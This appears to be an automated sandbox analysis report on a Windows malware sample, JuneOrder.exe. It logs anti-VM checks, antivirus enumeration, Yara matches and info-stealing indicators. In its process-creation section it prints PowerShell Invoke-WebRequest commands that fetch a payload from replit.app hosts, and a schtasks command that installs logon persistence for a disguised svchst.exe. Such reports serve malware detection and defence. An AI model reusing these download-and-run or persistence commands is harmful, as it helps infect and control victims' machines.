                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
                Source: CoinAIfdp.exe, CoinAIfdp.exe, 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, WindowsCache1289fgbfbfgsdvdh=74937962458.6.dr, windowscachergslog.bin.6.drBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 2B40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: E20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 1030000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 29B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 49B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: A60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 4380000 memory reserve | memory write watch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\JuneOrder.exeWindow / User API: threadDelayed 462Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4845Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5019Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6210Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3577Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeWindow / User API: threadDelayed 5435Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeWindow / User API: threadDelayed 4355Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exe TID: 1816Thread sleep count: 462 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep count: 4845 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep count: 5019 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4524Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep count: 6210 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep count: 3577 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 3364Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 2688Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 4640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 6760Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 5060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 5368Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 2156Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 5960Thread sleep count: 5435 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 5960Thread sleep count: 4355 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 4824Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 5992Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 6764Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 3136Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Roaming\svchst.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 60000
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 60000
                Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.tmpJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Temp\BC2F.tmpJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeFile opened: C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmpJump to behavior
                Source: JuneOrder.exe, 00000000.00000002.1632691680.0000000000632000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\VMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0001d0-94f2-00a0c91efb8b}
                Source: CoinAIfdp.exe, 00000006.00000002.1627064345.0000000000E73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: windowscachergslog.bin.6.drBinary or memory string: vmware
                Source: CoinAIfdp.exe, 00000006.00000002.1627064345.0000000000E73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: CoinAIfdp.exe, 00000006.00000002.1627064345.0000000000E73000.00000004.00000020.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2725016473.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040A756
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_00409950 SetUnhandledExceptionFilter,0_2_00409950
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00409930
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\JuneOrder.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\BC2F.tmp\BC30.tmp\BC31.bat C:\Users\user\Desktop\JuneOrder.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe CoinAIfdp.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exitJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE1C4.tmp.bat""Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe" Jump to behavior
                Source: svchst.exe, 0000000F.00000002.2727513271.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: svchst.exe, 0000000F.00000002.2727513271.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                Source: svchst.exe, 0000000F.00000002.2727513271.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.2727513271.0000000002A96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Users\user\AppData\Roaming\svchst.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Users\user\AppData\Roaming\svchst.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\svchst.exeQueries volume information: C:\Users\user\AppData\Roaming\svchst.exe VolumeInformation
                Source: C:\Users\user\Desktop\JuneOrder.exeCode function: 0_2_0040559A GetVersionExW,GetVersionExW,0_2_0040559A
                Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6040000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.55b128d.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.2de76a1.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.svchst.exe.2c66795.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2a067bd.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1631153124.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2727513271.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1630249483.00000000055B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1627907131.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1706148434.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1723329658.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 3796, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 4920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 6788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 2396, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
                Source: C:\Users\user\AppData\Roaming\svchst.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.0.CoinAIfdp.exe.9a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3db6588.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1629482910.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000000.1560929990.00000000009A2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
